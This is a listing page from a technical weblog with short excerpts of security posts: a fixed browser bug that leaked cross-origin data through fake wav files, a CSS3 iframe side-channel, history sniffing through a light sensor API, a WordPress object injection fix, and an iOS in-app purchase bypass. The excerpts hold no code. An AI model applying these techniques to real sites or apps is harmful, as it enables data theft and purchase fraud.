A rather geeky/technical weblog, est. 2001, by Bramus
Jake Archibald discovered a really nice browser bug (which is fixed by now) by which he was able to steal data from remote sites by loading it in as a (fake) wav file. The exploit works as follows: Make a request to evil-script, using a Content-Range header to suggest there’s more data to be loaded …
Continue reading “Wavethrough – Stealing data from remote sites through (fake) wav files”
Ruslan Habalov and Dario Weißer found a way to read contents from an iframe, using CSS3: Accessing the DOM of an iframe that includes a cross-origin resource is forbidden by default. However, the content of the iframe was displayed in the same context as the rest of the site so we wanted to verify if …
Continue reading “Side-channel attacking browsers through CSS3 features”
A few years ago window.getComputedStyle and the like where adjusted to return the default color of links, instead of the actual color on screen. Security and privacy were the driving factors behind that decision: by styling :visited links with a different color than their non-visited counterparts, a hacker could easily determine which sites a user …
Continue reading “Stealing your browser history with the W3C Ambient Light Sensor API”
WordPress 3.6.1 contains a PHP Object Injection Vulnerability Fix, detected by one of my former students. He also made an extensive writeup about it: Let’s recap: maybe_serialized(‘i:1;<funkycharacterhere>’) is inserted to the database. As WordPress does not see this as a serialized string (because it doesn’t end in ; or }), this will result in i:1;. …
We received some disturbing tips today that a Russian developer has published a method of obtaining in-app purchases from iOS apps for free. The “in-app proxy” method does not require a jailbreak, can be completed by novices in three steps using just an iOS device, and allows users to install in-app content for free. The …